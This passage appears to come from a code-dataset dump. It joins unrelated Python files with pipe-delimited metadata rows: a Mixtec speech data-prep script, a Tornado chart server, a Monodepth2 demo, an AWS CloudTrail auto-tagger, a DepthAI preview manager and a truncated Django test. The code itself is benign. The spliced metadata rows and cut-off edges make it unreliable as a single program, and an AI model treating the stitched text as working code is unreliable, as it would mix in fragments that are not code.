segments = open(os.path.join(target_dir, "segments"), "w", encoding="utf-8")
wavscp = open(os.path.join(target_dir, "wav.scp"), "w", encoding="utf-8")
utt2spk = open(os.path.join(target_dir, "utt2spk"), "w", encoding="utf-8")
spk2utt = open(os.path.join(target_dir, "spk2utt"), "w", encoding="utf-8")
text = open(os.path.join(target_dir, "text"), "w", encoding="utf-8")
name2spk = open(os.path.join(target_dir, "name2spk"), "w", encoding="utf-8")
remix_script = open(
os.path.join(target_dir, "remix_script.sh"), "w", encoding="utf-8"
)
# get relationship
sound_files = {}
annotation_files = {}
spk_id = 1
spk2utt_prep = {}
name2spk_prep = {}
if mode == "trs":
if not os.path.exists(os.path.join(target_dir, "temp")):
os.mkdir(os.path.join(target_dir, "temp"))
audio_set = set()
for root, dirs, files in os.walk(sound_dir):
for file in files:
if file[-4:] == ".wav":
sound_files[ExtractAudioID(file)] = os.path.join(root, file)
for root, dirs, files in os.walk(annotation_dir):
for file in files:
if file[-4:] == ".trs":
XMLRefine(
os.path.join(root, file), os.path.join(target_dir, "temp", file)
)
annotation_files[file] = os.path.join(target_dir, "temp", file)
for afile in annotation_files.keys():
if afile == "error":
continue
try:
audio_name, speakers, segment_info = XMLProcessing(
annotation_files[afile]
)
except Exception:
print("error process %s" % annotation_files[afile])
audio_name = audio_name.replace(" ", "")
audio_name = ExtractAudioID(audio_name)
if audio_name in audio_set:
continue
audio_set.add(audio_name)
if "%s.wav" % audio_name not in sound_files.keys():
print("no audio found for annotation: %s" % afile)
continue
# write wav.scp & segments & text files
print(
"%s sox -t wavpcm %s -c 1 -r 16000 -t wavpcm - |"
% (audio_name, sound_files["%s.wav" % audio_name]),
file=wavscp,
)
segment_number = 1
temp_speaker_id = {}
for speaker in speakers.keys():
name2spk_prep[speakers[speaker]["name"]] = name2spk_prep.get(
speakers[speaker]["name"], spk_id
)
temp_speaker_id[speaker] = name2spk_prep[speakers[speaker]["name"]]
if name2spk_prep[speakers[speaker]["name"]] == spk_id:
print(
"%s %s" % (speakers[speaker]["name"], PackZero(spk_id)),
file=name2spk,
)
spk_id += 1
for segment in segment_info:
# segment: [spk, text, start_time, end_time]
if segment[0] == "None":
spk = spk_id
spk_id += 1
else:
spk = temp_speaker_id[segment[0]]
segment_id = "%s_%s_%s" % (
PackZero(spk),
audio_name,
PackZero(segment_number),
)
# skip data error
skip = False
for seg in segment:
if len(seg) < 1:
print("warning segment %s in %s" % (segment_id, audio_name))
skip = True
if skip:
continue
print(
"%s %s %s %s" % (segment_id, audio_name, segment[2], segment[3]),
file=segments,
)
print("%s %s" % (segment_id, PackZero(spk)), file=utt2spk)
print("%s %s" % (segment_id, segment[1]), file=text)
spk2utt_prep[spk] = spk2utt_prep.get(spk, "") + " %s" % (segment_id)
segment_number += 1
for spk in spk2utt_prep.keys():
print("%s %s" % (spk, spk2utt_prep[spk]), file=spk2utt)
print("successfully processing %s" % afile)
shutil.rmtree(os.path.join(target_dir, "temp"))
else:
wav_spk_info = LoadWavSpeakerInfo(speaker_info)
spk_details = LoadSpeakerDetails(speaker_details)
for root, dirs, files in os.walk(sound_dir):
for file in files:
if file[-4:] == ".wav":
sound_files[ExtractAudioID(file, wav_spk_info)] = os.path.join(
root, file
)
for root, dirs, files in os.walk(annotation_dir):
for file in files:
if file[-4:] == ".eaf":
annotation_files[ExtractAudioID(file, wav_spk_info)] = os.path.join(
root, file
)
for afile in annotation_files.keys():
afile_path = annotation_files[afile]
if afile == "error":
continue
spk_info = wav_spk_info[afile]
segment_info = ELANProcess(afile_path, spk_info, spk_details, text_format)
if segment_info is None:
continue
left_channel_segments, right_channel_segments = segment_info
f = sf.SoundFile(sound_files[afile])
max_length = len(f) / f.samplerate
print(
'sox -t wavpcm "%s" -c 1 -r 16000 -t wavpcm %s-L.wav remix 1'
% (sound_files[afile], os.path.join(new_data_dir, afile)),
file=remix_script,
)
print(
"%s-L %s-L.wav" % (afile, os.path.join(new_data_dir, afile)),
file=wavscp,
)
segment_number = 0
for segment in left_channel_segments:
# segments: start end text
segment_id = "%s_%s-L_%s" % (
spk_info[0],
afile,
PackZero(segment_number),
)
if float(segment[1]) > max_length:
continue
print(
"%s %s-L %s %s" % (segment_id, afile, segment[0], segment[1]),
file=segments,
)
print("%s %s" % (segment_id, spk_info[0]), file=utt2spk)
print("%s %s" % (segment_id, segment[2]), file=text)
spk2utt_prep[spk_info[0]] = spk2utt_prep.get(
spk_info[0], ""
) + " %s" % (segment_id)
segment_number += 1
if len(right_channel_segments) > 0:
print(
'sox -t wavpcm "%s" -c 1 -r 16000 -t wavpcm %s-R.wav remix 2'
% (sound_files[afile], os.path.join(new_data_dir, afile)),
file=remix_script,
)
print(
"%s-R %s-R.wav" % (afile, os.path.join(new_data_dir, afile)),
file=wavscp,
)
for segment in right_channel_segments:
# segments: start end text
segment_id = "%s_%s-R_%s" % (
spk_info[1],
afile,
PackZero(segment_number),
)
if float(segment[1]) > max_length:
continue
print(
"%s %s-R %s %s" % (segment_id, afile, segment[0], segment[1]),
file=segments,
)
print("%s %s" % (segment_id, spk_info[1]), file=utt2spk)
print("%s %s" % (segment_id, segment[2]), file=text)
spk2utt_prep[spk_info[1]] = spk2utt_prep.get(
spk_info[1], ""
) + " %s" % (segment_id)
segment_number += 1
print("successfully processing %s" % afile)
for spk in spk2utt_prep.keys():
print("%s %s" % (spk, spk2utt_prep[spk]), file=spk2utt)
segments.close()
wavscp.close()
utt2spk.close()
spk2utt.close()
text.close()
if __name__ == "__main__":
parser = ArgumentParser(description="Process Raw data")
parser.add_argument(
"-w",
dest="wav_path",
type=str,
help="wav path",
default="",
)
parser.add_argument(
"-a",
dest="ann_path",
type=str,
help="annotation path",
default="",
)
parser.add_argument(
"-t", dest="target_dir", type=str, help="target_dir", default="data/mixtec"
)
parser.add_argument(
"-i",
dest="speaker_info",
type=str,
help="speaker info file dir",
default="local/speaker_wav_mapping_mixtec.csv",
)
parser.add_argument(
"-m",
dest="mode",
type=str,
help="transcription type",
default="eaf",
choices=["eaf", "trs"],
)
parser.add_argument(
"-n",
dest="new_data_dir",
type=str,
help="new data directory",
default="remixed",
)
parser.add_argument(
"-d",
dest="speaker_details",
type=str,
help="speaker details (i.e. names to code)",
default="local/Mixtec-consultant-database-unicode_2019-12-25.txt",
)
parser.add_argument(
"-f",
dest="text_format",
type=str,
help="text format",
default="",
choices=["surface", "underlying_full", "underlying_reduced", ""],
)
args = parser.parse_args()
TraverseData(
args.wav_path,
args.ann_path,
args.target_dir,
mode=args.mode,
speaker_info=args.speaker_info,
new_data_dir=args.new_data_dir,
speaker_details=args.speaker_details,
text_format=args.text_format,
)
| 36.019784 | 88 | 0.508963 | 2,112 | 20,027 | 4.65767 | 0.139678 | 0.00488 | 0.020331 | 0.019518 | 0.30121 | 0.235336 | 0.192437 | 0.183999 | 0.17424 | 0.166514 | 0 | 0.012105 | 0.372996 | 20,027 | 555 | 89 | 36.084685 | 0.771283 | 0.023468 | 0 | 0.27439 | 0 | 0.004065 | 0.085637 | 0.004658 | 0 | 0 | 0 | 0 | 0.002033 | 1 | 0.020325 | false | 0 | 0.01626 | 0.002033 | 0.058943 | 0.058943 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91feaf1b3da257c97ae5f3b02d3251782cab6063 | 3,514 | py | Python | drift.py | hclivess/ctez_stats | 45dedc77f7cffb201a0c836c9409cec42fb64eec | [
"MIT"
] | 6 | 2021-10-29T18:20:12.000Z | 2021-12-31T16:06:35.000Z | drift.py | hclivess/ctez_stats | 45dedc77f7cffb201a0c836c9409cec42fb64eec | [
"MIT"
] | 72 | 2021-09-13T13:17:14.000Z | 2022-02-08T16:56:21.000Z | drift.py | hclivess/ctez_stats | 45dedc77f7cffb201a0c836c9409cec42fb64eec | [
"MIT"
] | 12 | 2021-08-31T07:19:50.000Z | 2021-12-10T09:45:21.000Z | import tornado.ioloop
import tornado.web
import drift_collector
import threading
import time
import json
from datetime import datetime
def reduce(whole, reduce_to=1000):
"""reduce number of entries in list by skipping"""
reducer = int(len(whole) / reduce_to)
reduced = whole[::reducer]
return reduced
def to_ts(date_strings):
timestamps = []
for key in date_strings:
timestamp = datetime.timestamp(datetime.strptime(key, "%Y-%m-%d %H:%M:%S+00:00"))
timestamps.append(int(timestamp))
return timestamps
class ChartHandler(tornado.web.RequestHandler):
def get(self, data):
chart = ChartHandler.get_argument(self, "chart")
start = ChartHandler.get_argument(self, "start")
end = ChartHandler.get_argument(self, "end")
resolution = ChartHandler.get_argument(self, "resolution")
input_dict = drift_collector.read_input()
maximum = input_dict["stats"]["last_block"]
if end == "max":
end = maximum
if start == "min":
start = 1793972 # contract origination
if int(start) < 0: # if negative number is used, subtract it from maximum
start = maximum + int(start)
if int(start) < 1793972 and start > 0: # prevent oor operation (exclude negative numbers)
start = 1793972
if int(end) > maximum: # prevent oor operation
end = maximum
block_range = list(range(int(start), int(end) + 1)) # +1 to include in range
value_list = []
for key, value in input_dict["data"].items():
if int(start) <= int(key) <= int(end):
value_list.append(value[chart])
if resolution != "max":
if int(resolution) > int(end) - start:
resolution = int(end) - start
if resolution != "max" and int(resolution) <= 0:
resolution = 1
if resolution == "max":
resolution = len(block_range)
values = reduce(list(value_list), int(resolution))
labels = reduce(list(block_range), int(resolution))
self.render("chart.html",
labels=json.dumps(labels),
values=json.dumps(values),
title=chart
)
class ApiHandler(tornado.web.RequestHandler):
def get(self):
self.write(drift_collector.read_input())
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("dashboard.html")
def make_app():
return tornado.web.Application([
(r"/", MainHandler),
(r"/api", ApiHandler),
(r"/chart(.*)", ChartHandler),
(r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "static"}),
(r'/(favicon.ico)', tornado.web.StaticFileHandler, {"path": "static"}),
])
class ThreadedClient(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
while True:
try:
drift_collector.collect(block_last=drift_collector.block_last_get(),
block_start=drift_collector.block_start_get())
print("Sleeping...")
time.sleep(10)
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
background = ThreadedClient()
background.start()
print("Background process started")
app = make_app()
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
| 29.779661 | 98 | 0.593625 | 391 | 3,514 | 5.204604 | 0.332481 | 0.034398 | 0.045209 | 0.053071 | 0.090418 | 0.054054 | 0.037346 | 0 | 0 | 0 | 0 | 0.01627 | 0.282869 | 3,514 | 117 | 99 | 30.034188 | 0.79127 | 0.060615 | 0 | 0.068966 | 0 | 0 | 0.066849 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.091954 | false | 0 | 0.08046 | 0.011494 | 0.252874 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6205bfcc1dd448dd56cf8db5404490df7dab8b66 | 7,947 | py | Python | scripts/depth/demo.py | Kh4L/gluon-cv | 849411ed56632cd854850b07142087d599f97dcb | [
"Apache-2.0"
] | 5,447 | 2018-04-25T18:02:51.000Z | 2022-03-31T00:59:49.000Z | scripts/depth/demo.py | Kh4L/gluon-cv | 849411ed56632cd854850b07142087d599f97dcb | [
"Apache-2.0"
] | 1,566 | 2018-04-25T21:14:04.000Z | 2022-03-31T06:42:42.000Z | scripts/depth/demo.py | Kh4L/gluon-cv | 849411ed56632cd854850b07142087d599f97dcb | [
"Apache-2.0"
] | 1,345 | 2018-04-25T18:44:13.000Z | 2022-03-30T19:32:53.000Z | import os
import argparse
import time
import PIL.Image as pil
import numpy as np
import mxnet as mx
from mxnet.gluon.data.vision import transforms
import gluoncv
from gluoncv.model_zoo.monodepthv2.layers import disp_to_depth
import matplotlib as mpl
import matplotlib.cm as cm
import cv2
# using cpu
ctx = mx.cpu(0)
def parse_args():
"""Training Options for Depth Prediction Experiments"""
parser = argparse.ArgumentParser(description='MXNet Gluon Monodepth2 Demo')
# model and dataset
parser.add_argument('--model_zoo', type=str,
choices=['monodepth2_resnet18_kitti_stereo_640x192',
'monodepth2_resnet18_kitti_mono_640x192',
'monodepth2_resnet18_kitti_mono_stereo_640x192'],
default='monodepth2_resnet18_kitti_mono_stereo_640x192',
help='choose depth model from model zoo model')
parser.add_argument('--input_format', type=str,
choices=['image', 'video'], default='image',
help='choose the format of input data')
parser.add_argument("--data_path", type=str, help="path to the data")
parser.add_argument("--height", type=int, help="input image height", default=192)
parser.add_argument("--width", type=int, help="input image width", default=640)
parser.add_argument('--prediction_only', action="store_true",
help='if true, just store pure prediction results')
parser.add_argument('--use_depth', action="store_true",
help='use depth map as prediction results')
parser.add_argument('--output_format', type=str,
choices=['image', 'video'], default='video',
help='choose the format of output')
parser.add_argument("--output_path", type=str, help="path to store the results",
default=os.path.join(os.path.expanduser("."), "tmp"))
# the parser
args = parser.parse_args()
return args
def read_img(files, data_path):
raw_img_sequences = []
for file in files:
file = os.path.join(data_path, file)
img = pil.open(file).convert('RGB')
raw_img_sequences.append(img)
original_width, original_height = raw_img_sequences[0].size
return raw_img_sequences, original_width, original_height
def read_video(data_path):
raw_img_sequences = []
files = []
frame_index = 0
cap = cv2.VideoCapture(data_path)
while cap.isOpened():
ret, frame = cap.read()
# if frame is read correctly ret is True
if not ret:
print("Can't receive frame (stream end?). Exiting ...")
break
img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
img = pil.fromarray(img)
raw_img_sequences.append(img)
f_str = "{:010d}.png".format(frame_index)
files.append(f_str)
frame_index += 1
if cv2.waitKey(1) == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
original_width, original_height = raw_img_sequences[0].size
return raw_img_sequences, files, original_width, original_height
if __name__ == '__main__':
args = parse_args()
############################ Loading Data ############################
print("Loading Data......")
tic = time.time()
if args.input_format == 'image':
assert os.path.isdir(args.data_path), \
"--data_path must be a direction when input_format is 'image'"
files = os.listdir(args.data_path)
files.sort()
raw_img_sequences, original_width, original_height = \
read_img(files=files, data_path=args.data_path)
elif args.input_format == 'video':
assert os.path.isfile(args.data_path), \
"--data_path must be a video file when input_format is 'video'"
raw_img_sequences, files, original_width, original_height = \
read_video(data_path=args.data_path)
feed_height = args.height
feed_width = args.width
t_consuming = time.time() - tic
print("Data loaded! Time consuming: {:0.3f}s\n".format(t_consuming))
############################ Prepare Models and Prediction ############################
print("Loading Model and Prediction......")
tic = time.time()
# while use stereo or mono+stereo model, we could get real depth value
min_depth = 0.1
max_depth = 100
scale_factor = 5.4
MIN_DEPTH = 1e-3
MAX_DEPTH = 80
model = gluoncv.model_zoo.get_model(args.model_zoo,
pretrained_base=False, ctx=ctx, pretrained=True)
pred_sequences = []
for img in raw_img_sequences:
img = img.resize((feed_width, feed_height), pil.LANCZOS)
img = transforms.ToTensor()(mx.nd.array(img)).expand_dims(0).as_in_context(context=ctx)
outputs = model.predict(img)
mx.nd.waitall()
pred_disp, _ = disp_to_depth(outputs[("disp", 0)], min_depth, max_depth)
t = time.time()
pred_disp = pred_disp.squeeze().as_in_context(mx.cpu()).asnumpy()
pred_disp = cv2.resize(src=pred_disp, dsize=(original_width, original_height))
pred_depth = 1 / pred_disp
if args.model_zoo != 'monodepth2_resnet18_kitti_mono_640x192':
pred_depth *= scale_factor
pred_depth[pred_depth < MIN_DEPTH] = MIN_DEPTH
pred_depth[pred_depth > MAX_DEPTH] = MAX_DEPTH
if args.use_depth:
pred_sequences.append(pred_depth)
else:
pred_sequences.append(pred_disp)
t_consuming = time.time() - tic
print("Finished prediction! Time consuming: {:0.3f}s\n".format(t_consuming))
############################ Visualization & Store Videos ############################
print("Visualization and Store Results......")
tic = time.time()
if args.prediction_only:
pred_path = os.path.join(args.output_path, 'pred')
if not os.path.exists(pred_path):
os.makedirs(pred_path)
for pred, file in zip(pred_sequences, files):
pred_out_file = os.path.join(pred_path, file)
cv2.imwrite(pred_out_file, pred)
else:
rgb_path = os.path.join(args.output_path, 'rgb')
if not os.path.exists(rgb_path):
os.makedirs(rgb_path)
output_sequences = []
for raw_img, pred, file in zip(raw_img_sequences, pred_sequences, files):
vmax = np.percentile(pred, 95)
normalizer = mpl.colors.Normalize(vmin=pred.min(), vmax=vmax)
mapper = cm.ScalarMappable(norm=normalizer, cmap='magma')
colormapped_im = (mapper.to_rgba(pred)[:, :, :3] * 255).astype(np.uint8)
im = pil.fromarray(colormapped_im)
raw_img = np.array(raw_img)
pred = np.array(im)
output = np.concatenate((raw_img, pred), axis=0)
output_sequences.append(output)
if args.output_format == 'image':
pred_out_file = os.path.join(rgb_path, file)
cv2.imwrite(pred_out_file, cv2.cvtColor(pred, cv2.COLOR_RGB2BGR))
if args.output_format == 'video':
width = int(output_sequences[0].shape[1] + 0.5)
height = int(output_sequences[0].shape[0] + 0.5)
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out = cv2.VideoWriter(
os.path.join(args.output_path, 'demo.mp4'), fourcc, 20.0, (width, height))
for frame in output_sequences:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
out.write(frame)
cv2.imshow('demo', frame)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
out.release()
cv2.destroyAllWindows()
t_consuming = time.time() - tic
print("Finished! Time consuming: {:0.3f}s".format(t_consuming))
| 35.797297 | 95 | 0.606644 | 993 | 7,947 | 4.642497 | 0.229607 | 0.020824 | 0.039046 | 0.040998 | 0.309328 | 0.190022 | 0.143601 | 0.073102 | 0.044252 | 0.029501 | 0 | 0.021635 | 0.261356 | 7,947 | 221 | 96 | 35.959276 | 0.763714 | 0.034101 | 0 | 0.118012 | 0 | 0 | 0.146325 | 0.027478 | 0 | 0 | 0.000534 | 0 | 0.012422 | 1 | 0.018634 | false | 0 | 0.074534 | 0 | 0.111801 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
620832d92d4d07ef75358e205a0f28656dce526b | 899 | py | Python | tat_aws_creator_auto_tag/handlers/tag_resource.py | techantllc/aws-creator-auto-tagger | 413c9f6c91cfaa088bbc45bed0f6c9f09e02f48a | [
"MIT"
] | null | null | null | tat_aws_creator_auto_tag/handlers/tag_resource.py | techantllc/aws-creator-auto-tagger | 413c9f6c91cfaa088bbc45bed0f6c9f09e02f48a | [
"MIT"
] | null | null | null | tat_aws_creator_auto_tag/handlers/tag_resource.py | techantllc/aws-creator-auto-tagger | 413c9f6c91cfaa088bbc45bed0f6c9f09e02f48a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import gzip
import json
from tat_aws_creator_auto_tag.boto_ses import boto_ses
from tat_aws_creator_auto_tag.events import EventName, RecordParser, ResourceNotSupportedError
from tat_aws_creator_auto_tag.logger import logger
s3_client = boto_ses.client("s3")
def handler(event, context):
bucket_name = event["Records"][0]["s3"]["bucket"]["name"]
object_key = event["Records"][0]["s3"]["object"]["key"]
res_get_object = s3_client.get_object(
Bucket=bucket_name, Key=object_key
)
content = res_get_object["Body"].read()
cloudtrail_data = json.loads(gzip.decompress(content).decode("utf-8"))
for record in cloudtrail_data["Records"]:
if RecordParser.is_create_event(record):
try:
EventName.tag_it(record, boto_ses, verbose=True)
except ResourceNotSupportedError as _:
pass
| 33.296296 | 94 | 0.695217 | 118 | 899 | 5.016949 | 0.457627 | 0.047297 | 0.050676 | 0.086149 | 0.121622 | 0.121622 | 0 | 0 | 0 | 0 | 0 | 0.012295 | 0.185762 | 899 | 26 | 95 | 34.576923 | 0.796448 | 0.023359 | 0 | 0 | 0 | 0 | 0.062785 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0.05 | 0.25 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62086a659812b4cdfdb304e187e0dcc22714aad3 | 9,964 | py | Python | depthai_sdk/src/depthai_sdk/managers/preview_manager.py | crisdeodates/AI-depthai | e27c75ae26d91556b6c9bd0ac3481bfde4a40b39 | [
"MIT"
] | null | null | null | depthai_sdk/src/depthai_sdk/managers/preview_manager.py | crisdeodates/AI-depthai | e27c75ae26d91556b6c9bd0ac3481bfde4a40b39 | [
"MIT"
] | null | null | null | depthai_sdk/src/depthai_sdk/managers/preview_manager.py | crisdeodates/AI-depthai | e27c75ae26d91556b6c9bd0ac3481bfde4a40b39 | [
"MIT"
] | null | null | null | import math
import cv2
import depthai as dai
from ..previews import Previews, MouseClickTracker
class PreviewManager:
"""
Manager class that handles frames and displays them correctly.
"""
#: dict: Contains name -> frame mapping that can be used to modify specific frames directly
frames = {}
def __init__(self, display=[], nnSource=None, colorMap=cv2.COLORMAP_JET, depthConfig=None, dispMultiplier=255/96, mouseTracker=False, lowBandwidth=False, scale=None, sync=False, fpsHandler=None, createWindows=True):
"""
Args:
display (list, Optional): List of :obj:`depthai_sdk.Previews` objects representing the streams to display
mouseTracker (bool, Optional): If set to :code:`True`, will enable mouse tracker on the preview windows that will display selected pixel value
fpsHandler (depthai_sdk.fps.FPSHandler, Optional): if provided, will use fps handler to modify stream FPS and display it
sync (bool, Optional): If set to :code:`True`, will assume that neural network source camera will not contain raw frame but scaled frame used by NN
nnSource (str, Optional): Specifies NN source camera
colorMap (cv2 color map, Optional): Color map applied on the depth frames
lowBandwidth (bool, Optional): If set to :code:`True`, will decode the received frames assuming they were encoded with MJPEG encoding
scale (dict, Optional): Allows to scale down frames before preview. Useful when previewing e.g. 4K frames
dispMultiplier (float, Optional): Multiplier used for depth <-> disparity calculations (calculated on baseline and focal)
depthConfig (depthai.StereoDepthConfig, optional): Configuration used for depth <-> disparity calculations
createWindows (bool, Optional): If True, will create preview windows using OpenCV (enabled by default)
"""
self.sync = sync
self.nnSource = nnSource
self.colorMap = colorMap
self.lowBandwidth = lowBandwidth
self.scale = scale
self.dispMultiplier = dispMultiplier
self._depthConfig = depthConfig
self._fpsHandler = fpsHandler
self._mouseTracker = MouseClickTracker() if mouseTracker else None
self._display = display
self._createWindows = createWindows
self._rawFrames = {}
def collectCalibData(self, device):
"""
Collects calibration data and calculates :attr:`dispScaleFactor` accordingly
Args:
device (depthai.Device): Running device instance
"""
calib = device.readCalibration()
eeprom = calib.getEepromData()
leftCam = calib.getStereoLeftCameraId()
if leftCam != dai.CameraBoardSocket.AUTO:
camInfo = eeprom.cameraData[leftCam]
self.baseline = abs(camInfo.extrinsics.specTranslation.x * 10) # cm -> mm
self.fov = calib.getFov(calib.getStereoLeftCameraId())
self.focal = (camInfo.width / 2) / (2. * math.tan(math.radians(self.fov / 2)))
else:
print("Warning: calibration data missing, using OAK-D defaults")
self.baseline = 75
self.fov = 71.86
self.focal = 440
self.dispScaleFactor = self.baseline * self.focal
def createQueues(self, device, callback=None):
"""
Create output queues for requested preview streams
Args:
device (depthai.Device): Running device instance
callback (func, Optional): Function that will be executed with preview name once preview window was created
"""
self.outputQueues = []
for name in self._display:
if self._createWindows:
cv2.namedWindow(name)
if callable(callback):
callback(name)
if self._createWindows and self._mouseTracker is not None:
cv2.setMouseCallback(name, self._mouseTracker.selectPoint(name))
if name not in (Previews.disparityColor.name, Previews.depth.name): # generated on host
self.outputQueues.append(device.getOutputQueue(name=name, maxSize=1, blocking=False))
if Previews.disparityColor.name in self._display and Previews.disparity.name not in self._display:
self.outputQueues.append(device.getOutputQueue(name=Previews.disparity.name, maxSize=1, blocking=False))
if Previews.depth.name in self._display and Previews.depthRaw.name not in self._display:
self.outputQueues.append(device.getOutputQueue(name=Previews.depthRaw.name, maxSize=1, blocking=False))
def closeQueues(self):
"""
Closes output queues for requested preview streams
"""
for queue in self.outputQueues:
queue.close()
def prepareFrames(self, blocking=False, callback=None):
"""
This function consumes output queues' packets and parses them to obtain ready to use frames.
To convert the frames from packets, this manager uses methods defined in :obj:`depthai_sdk.previews.PreviewDecoder`.
Args:
blocking (bool, Optional): If set to :code:`True`, will wait for a packet in each queue to be available
callback (func, Optional): Function that will be executed once packet with frame has arrived
"""
for queue in self.outputQueues:
if blocking:
packet = queue.get()
else:
packet = queue.tryGet()
if packet is not None:
if self._fpsHandler is not None:
self._fpsHandler.tick(queue.getName())
frame = getattr(Previews, queue.getName()).value(packet, self)
if frame is None:
print("[WARNING] Conversion of the {} frame has failed! (None value detected)".format(queue.getName()))
continue
if self.scale is not None and queue.getName() in self.scale:
h, w = frame.shape[0:2]
frame = cv2.resize(frame, (int(w * self.scale[queue.getName()]), int(h * self.scale[queue.getName()])), interpolation=cv2.INTER_AREA)
if queue.getName() in self._display:
if callback is not None:
callback(frame, queue.getName())
self._rawFrames[queue.getName()] = frame
if self._mouseTracker is not None:
if queue.getName() == Previews.disparity.name:
rawFrame = packet.getFrame() if not self.lowBandwidth else cv2.imdecode(packet.getData(), cv2.IMREAD_GRAYSCALE)
self._mouseTracker.extractValue(Previews.disparity.name, rawFrame)
self._mouseTracker.extractValue(Previews.disparityColor.name, rawFrame)
if queue.getName() == Previews.depthRaw.name:
rawFrame = packet.getFrame() # if not self.lowBandwidth else cv2.imdecode(packet.getData(), cv2.IMREAD_UNCHANGED) TODO uncomment once depth encoding is possible
self._mouseTracker.extractValue(Previews.depthRaw.name, rawFrame)
self._mouseTracker.extractValue(Previews.depth.name, rawFrame)
else:
self._mouseTracker.extractValue(queue.getName(), frame)
if queue.getName() == Previews.disparity.name and Previews.disparityColor.name in self._display:
if self._fpsHandler is not None:
self._fpsHandler.tick(Previews.disparityColor.name)
self._rawFrames[Previews.disparityColor.name] = Previews.disparityColor.value(frame, self)
if queue.getName() == Previews.depthRaw.name and Previews.depth.name in self._display:
if self._fpsHandler is not None:
self._fpsHandler.tick(Previews.depth.name)
self._rawFrames[Previews.depth.name] = Previews.depth.value(frame, self)
for name in self._rawFrames:
newFrame = self._rawFrames[name].copy()
if name == Previews.depthRaw.name:
newFrame = cv2.normalize(newFrame, None, 255, 0, cv2.NORM_INF, cv2.CV_8UC1)
self.frames[name] = newFrame
def showFrames(self, callback=None):
"""
Displays stored frame onto preview windows.
Args:
callback (func, Optional): Function that will be executed right before :code:`cv2.imshow`
"""
for name, frame in self.frames.items():
if self._mouseTracker is not None:
point = self._mouseTracker.points.get(name)
value = self._mouseTracker.values.get(name)
if point is not None:
cv2.circle(frame, point, 3, (255, 255, 255), -1)
cv2.putText(frame, str(value), (point[0] + 5, point[1] + 5), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 0, 0), 4, cv2.LINE_AA)
cv2.putText(frame, str(value), (point[0] + 5, point[1] + 5), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
if callable(callback):
newFrame = callback(frame, name)
if newFrame is not None:
frame = newFrame
if self._createWindows:
cv2.imshow(name, frame)
def has(self, name):
"""
Determines whether manager has a frame assigned to specified preview
Returns:
bool: :code:`True` if contains a frame, :code:`False` otherwise
"""
return name in self.frames
def get(self, name):
"""
Returns a frame assigned to specified preview
Returns:
numpy.ndarray: Resolved frame, will default to :code:`None` if not present
"""
return self.frames.get(name, None)
| 51.097436 | 219 | 0.621738 | 1,114 | 9,964 | 5.508977 | 0.265709 | 0.013687 | 0.016132 | 0.01385 | 0.299658 | 0.268535 | 0.181359 | 0.142904 | 0.100212 | 0.093205 | 0 | 0.012866 | 0.290145 | 9,964 | 194 | 220 | 51.360825 | 0.8548 | 0.284725 | 0 | 0.121739 | 0 | 0 | 0.018612 | 0 | 0 | 0 | 0 | 0.005155 | 0 | 1 | 0.069565 | false | 0 | 0.034783 | 0 | 0.13913 | 0.017391 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
620aba71ed54ba7a38335320b77cef0075b92456 | 2,823 | py | Python | backend/backend/tests/authentication_views/user_api.py | Drew138/v_website | c5b6556ccaf146d2296ff0c48c7473a7cc63d2ad | [
"MIT"
] | null | null | null | backend/backend/tests/authentication_views/user_api.py | Drew138/v_website | c5b6556ccaf146d2296ff0c48c7473a7cc63d2ad | [
"MIT"
] | 8 | 2020-12-03T15:15:32.000Z | 2022-03-12T00:58:27.000Z | backend/backend/tests/authentication_views/user_api.py | Drew138/v_website | c5b6556ccaf146d2296ff0c48c7473a7cc63d2ad | [
"MIT"
] | 1 | 2021-04-09T16:17:11.000Z | 2021-04-09T16:17:11.000Z | from rest_framework_simplejwt.tokens import RefreshToken
from rest_framework.test import APITestCase
from rest_framework import status
from django.urls import reverse
from model_bakery import baker
class TestUserAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.user_url = reverse('user')
cls.user = baker.make('backend.VibroUser')
